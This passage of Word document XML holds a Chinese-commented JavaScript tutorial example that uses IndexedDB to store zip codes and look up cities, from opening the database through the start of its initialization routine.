      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>此函数异步地获取数据库对象（需要的时候，用于创建和初始化数据库），</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后将其传递给</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function withDB(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=indexedDB.open("zipcodes");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取存储邮政编码的数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onerror=logerr;//</w:t>
      </w:r>
      <w:r>
        <w:t>以日志的方式记录发生的错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onsuccess=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>或者完成的时候调用此回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var db=request.result;//request</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>值就表示该数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>即便该数据库不存在，也总能够打开它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通过检查版本号来确定数据库是否已经创建或者初始化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果还没有，就做相应的创建或者初始化的工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:r>
        <w:t>已经存在了，那么只需要将它传递给回调函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>就可以了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(db.version==="</w:t>
      </w:r>
      <w:r>
        <w:t>1")f(db);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>db</w:t>
      </w:r>
      <w:r>
        <w:t>已经初始化了，就直接将它传递给</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else initdb(db,f);//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，先初始化</w:t>
      </w:r>
      <w:r>
        <w:t>db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>给定一个邮政编码，查询该邮政编码属于哪个城市，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并将该城市名异步传递给指定的回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function lookupCity(zip,callback){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>withDB(function(db){//</w:t>
      </w:r>
      <w:r>
        <w:t>为本次查询创建一个事务对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var transaction=db.transaction(["zipcodes"],//</w:t>
      </w:r>
      <w:r>
        <w:t>所需的对象存储区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>IDBTransaction.READ_ONLY,//</w:t>
      </w:r>
      <w:r>
        <w:t>没有更新</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0);//</w:t>
      </w:r>
      <w:r>
        <w:t>没有超时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>从事务中获取对象存储区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var objects=transaction.objectStore("zipcodes");//</w:t>
      </w:r>
      <w:r>
        <w:t>查询和指定的邮政编码的键匹配的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>上述代码是同步的，但是这里的是异步的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=objects.get(zip);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onerror=logerr;//</w:t>
      </w:r>
      <w:r>
        <w:t>以日志形式记录发生的错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onsuccess=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>将结果传递给此函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//result</w:t>
      </w:r>
      <w:r>
        <w:t>对象可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>request.result</w:t>
      </w:r>
      <w:r>
        <w:t>属性获取</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var object=request.result;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(object)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果查询到了，就将城市和州名传递给回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(object.city+","+object.state);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，告诉回调函数，失败了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>callback("Unknown zip code");</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给定城市名（区分大小写），来查询对应的邮政编码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后挨个将结果异步地传递给指定的回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function lookup</w:t>
      </w:r>
      <w:r>
        <w:t>Zipcodes(city,callback){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>withDB(function(db){//</w:t>
      </w:r>
      <w:r>
        <w:t>和上述的情况一致，创建一个事务并获取对象存储区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var transaction=db.transaction(["zipcodes"],IDBTransaction.READ_ONLY,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var store=transaction.objectStore("zipcodes");//</w:t>
      </w:r>
      <w:r>
        <w:t>这次，从对象存储区中获取城市索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var index=store.index("cities");//</w:t>
      </w:r>
      <w:r>
        <w:t>此次查询可能会返回很多结果</w:t>
      </w:r>
      <w:r>
        <w:t>，因此，必须使用游标对象来获取它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>要创建一个游标，需要一个表示键值范围的</w:t>
      </w:r>
      <w:r>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var range=new IDBKeyRange.only(city);//</w:t>
      </w:r>
      <w:r>
        <w:t>传递一个单键给</w:t>
      </w:r>
      <w:r>
        <w:t>only()</w:t>
      </w:r>
      <w:r>
        <w:t>方法获取一个</w:t>
      </w:r>
      <w:r>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>上述所有的操作都是同步的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在，请求一个游标，它会以异步的方式返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=index.openCursor(range);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取该游标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onerror=logerr;//</w:t>
      </w:r>
      <w:r>
        <w:t>记录错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onsuccess=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>将游标传递给此函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>此事件处理程序会调用多次，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>每次有匹配查询的记录会调用一次，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后当标识操作结束的</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>游标出现的时候，也会调用一次</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cursor=request.result//</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>request.result</w:t>
      </w:r>
      <w:r>
        <w:t>获取游标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!cursor)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有游标就说明没有结果了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var object=cursor.value//</w:t>
      </w:r>
      <w:r>
        <w:t>获取匹配的数据项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>callback(object);//</w:t>
      </w:r>
      <w:r>
        <w:t>将其传递给回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>cursor.continue();//</w:t>
      </w:r>
      <w:r>
        <w:t>继续请求下一个匹配的数据项</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下面展示的，</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>回调函数会用到此方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>此方法查询数据库并展示查询到的结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function displayCity(zip){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>lookupCity(zip,function(s){document.getElementById('city').value=s;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这是下面的文档中使用的另一个</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它查询数据库并展示查询到的结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function displayZipcodes(city){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>output=document.getElementById("zipcodes");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>output.innerHTML="Matching zipcodes:";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>lookupZipcodes(city,function(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var div=document.createElement("div");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text=o.zipcode+":"+o.city+","+o.state;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>div.appendChild(document.createTextNode(text));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>output.app</w:t>
      </w:r>
      <w:r>
        <w:t>endChild(div);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>建立数据库的结构，并用相应的数据填充它，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后将该数据库传递给</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果数据库还未初始化，</w:t>
      </w:r>
      <w:r>
        <w:t>withDB()</w:t>
      </w:r>
      <w:r>
        <w:t>函数会调用此函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这也是此程序中最巧妙的部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function initdb(db,f){//</w:t>
      </w:r>
      <w:r>
        <w:t>第一次运行此应用的时候，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>下载邮政编码数据并将它们存储到数据库中，需要花一些时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因此在下载过程中，有必要给出提示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var statusline=document.createElement("div");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statusline.style.cssText=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"position:fixed;left:0px;top:0px;width:100%;"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"color:white;background-color:black;font:bold 18pt sans-serif;"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"padding:10px;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.appendChild(statusline);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function status(msg){statusline.innerHTML=msg.toString();};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>st</w:t>
      </w:r>
      <w:r>
        <w:t>atus("Initializing zipcode database");//</w:t>
      </w:r>
      <w:r>
        <w:t>只有在</w:t>
      </w:r>
      <w:r>
        <w:t>setVersion</w:t>
      </w:r>
      <w:r>
        <w:t>请求的</w:t>
      </w:r>
      <w:r>
        <w:t>onsuccess</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序中才能定义或者修改</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>数据库的结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=db.setVersion("1");//</w:t>
      </w:r>
      <w:r>
        <w:t>试着更新数据库的版本号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onerror=status;//</w:t>
      </w:r>
      <w:r>
        <w:t>失败的话，显示状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.onsuccess=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，调用此函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里邮政编码数据库只包含一个对象存储区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>该存储区包含如下形式的对象：</w:t>
      </w:r>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>zipcode:"02134",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>发送到</w:t>
      </w:r>
      <w:r>
        <w:t>Zoom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//city:"Allston",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//state:"MA",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//latitude:"42.355147",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//longitude:"-71.13164"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用对象的</w:t>
      </w:r>
      <w:r>
        <w:t>"zipcode"</w:t>
      </w:r>
      <w:r>
        <w:t>属性作为数据库的键</w:t>
      </w:r>
    </w:p>
